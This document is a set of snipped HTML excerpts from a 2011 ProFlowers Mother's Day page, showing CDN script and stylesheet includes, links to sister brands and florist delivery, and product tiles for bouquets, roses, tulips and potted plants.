</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/floristexpresspopupscript.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<link rel="canonical" href="http://www.proflowers.com/mothers-day-flowers-mdf"/>
       <link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_category.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
   </head>
...[SNIP]...
<div id="innerContainer">

                       <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.berries.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.berries.com/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef" target="_blank" style="height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" border="0" /></a>
...[SNIP]...
<a id="_ctl14__homeLink" border="0" title="Go to ProFlowers Homepage" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/?tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" border="0" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="_ctl14__ctl91__repeater__ctl0__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_Category_#productgroup#_PRODUCTGROUP-MDF" target="_blank">Today</a>
...[SNIP]...
<a onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_hero1&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" border="0" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
d="productsearchlink" rel="nofollow" type="image" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef&amp;productgroup=MDF" style="height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Moms-Delight-5566?viewpos=1&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQspringblooms_pnk09_CONTROL_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mom&#39;s Delight" border="0" /></a>
...[SNIP]...
lt="Details - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Moms-Delight-5566?viewpos=1&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
wers.com/flowers/One-Dozen-Long-Stem-Rainbow-Mothers-Day-Roses-wPink-Vase--Chocolates-30053962?viewpos=2&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_FVFC_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="One Dozen Long Stem Rainbow Mother&#39;s Day Roses w/Pink Vase &amp; Chocolates" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/flowers/One-Dozen-Long-Stem-Rainbow-Mothers-Day-Roses-wPink-Vase--Chocolates-30053962?viewpos=2&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
tMVTFreeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Spectacular-41213?viewpos=3&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQjoyfulbouquet_pnk10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mother&#39;s Day Spectacular" border="0" /></a>
...[SNIP]...
- Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Spectacular-41213?viewpos=3&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
rs" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Super-Mom-435?viewpos=4&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQcarnival10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Super Mom" border="0" /></a>
...[SNIP]...
k" alt="Details - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Super-Mom-435?viewpos=4&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
</div><a class="relatedLinks" href="http://www.floristExpress.net?refcode=RFD&amp;LinkLocation=RelatedLinks" target="_blank">Local Florist Delivery</a>
...[SNIP]...
</div> <img class="brandTile" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/170x148_CAT_generic.jpg" border="0" /></div>
...[SNIP]...
ref="http://products.proflowers.com//Two-Dozen-Long-Stemmed-Rainbow-Mothers-Day-Roses-30004315?viewpos=5&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Dozen Long Stemmed Rainbow Mother&#39;s Day Roses" border="0" /></a>
...[SNIP]...
onclick="exitMVTFreeVase=false" href="http://products.proflowers.com//Two-Dozen-Long-Stemmed-Rainbow-Mothers-Day-Roses-30004315?viewpos=5&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/Lilies-for-Mom-482?viewpos=6&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/LLYassrtories4_pnk10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Lilies for Mom" border="0" /></a>
...[SNIP]...
lt="Details - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/lilies/Lilies-for-Mom-482?viewpos=6&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
lick="exitMVTFreeVase=false" href="http://products.proflowers.com/tulips/20-Tulips-for-Mom-426?viewpos=7&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL20assrt_grn10_test_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="20 Tulips for Mom" border="0" /></a>
...[SNIP]...
"Details - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/tulips/20-Tulips-for-Mom-426?viewpos=7&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Moms-Delight-5568?viewpos=8&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxsprngblms_pnk11_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Deluxe Mom&#39;s Delight" border="0" /></a>
...[SNIP]...
ails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Deluxe-Moms-Delight-5568?viewpos=8&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
reeVase=false" href="http://products.proflowers.com/roses/Two-Dozen-Assorted-Petite-Roses-4768?viewpos=9&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Dozen Assorted Petite Roses" border="0" /></a>
...[SNIP]...
Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/roses/Two-Dozen-Assorted-Petite-Roses-4768?viewpos=9&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/bonsai/Azalea-Bonsai-for-Mom-41340?viewpos=10&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTazaleabons10_bloom_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Azalea Bonsai for Mom" border="0" /></a>
...[SNIP]...
s - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/bonsai/Azalea-Bonsai-for-Mom-41340?viewpos=10&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/chocolate/Full-Dozen-HandDipped-Fancy-Berries-9722?viewpos=11&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/DIP_BRR10012_BerryTestFancy12_GEN_11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Full Dozen Giant Dipped Fancy Berries" border="0" /></a>
...[SNIP]...
der="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/chocolate/Full-Dozen-HandDipped-Fancy-Berries-9722?viewpos=11&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
k="exitMVTFreeVase=false" href="http://products.proflowers.com/roses/Two-Dozen-Red-Roses-1737?viewpos=12&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Dozen Red Roses" border="0" /></a>
...[SNIP]...
tails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/roses/Two-Dozen-Red-Roses-1737?viewpos=12&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
se=false" href="http://products.proflowers.com/roses/Two-Dozen-Rainbow-Mothers-Day-Roses-6103?viewpos=13&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Two Dozen Rainbow Mother&#39;s Day Roses" border="0" /></a>
...[SNIP]...
border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/roses/Two-Dozen-Rainbow-Mothers-Day-Roses-6103?viewpos=13&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
eeVase=false" href="http://products.proflowers.com/pottedroses/Potted-Mothers-Day-Roses-41362?viewpos=14&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpinkros_ltbskt10_PC0841PB_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Mother&#39;s Day Roses" border="0" /></a>
...[SNIP]...
Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/pottedroses/Potted-Mothers-Day-Roses-41362?viewpos=14&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
VTFreeVase=false" href="http://products.proflowers.com/orchids/Purple-Dendrobium-Orchids-3755?viewpos=15&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQ15orchpurp10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Purple Dendrobium Orchids" border="0" /></a>
...[SNIP]...
Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/orchids/Purple-Dendrobium-Orchids-3755?viewpos=15&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
"exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sunflower-Radiance-40369?viewpos=16&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M519_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sunflower Radiance" border="0" /></a>
...[SNIP]...
ils - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sunflower-Radiance-40369?viewpos=16&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
click="exitMVTFreeVase=false" href="http://products.proflowers.com/tulips/Tulips-for-Mom-4811?viewpos=17&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/TUL15assrt_sgv09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Tulips for Mom" border="0" /></a>
...[SNIP]...
="Details - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/tulips/Tulips-for-Mom-4811?viewpos=17&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
reeVase=false" href="http://products.proflowers.com/plants/Potted-Pink-Calla-Lily-for-Mom-494?viewpos=18&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Pink Calla Lily for Mom" border="0" /></a>
...[SNIP]...
Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Potted-Pink-Calla-Lily-for-Mom-494?viewpos=18&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
p://products.proflowers.com/flowers/One-Dozen-Long-Stemmed-Rainbow-Mothers-Day-Roses-30046443?viewpos=19&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000R212_VA1137_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="One Dozen Long Stemmed Rainbow Mother&#39;s Day Roses" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/One-Dozen-Long-Stemmed-Rainbow-Mothers-Day-Roses-30046443?viewpos=19&amp;trackingpgroup=MDF&amp;tile=hmpg_hero1&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
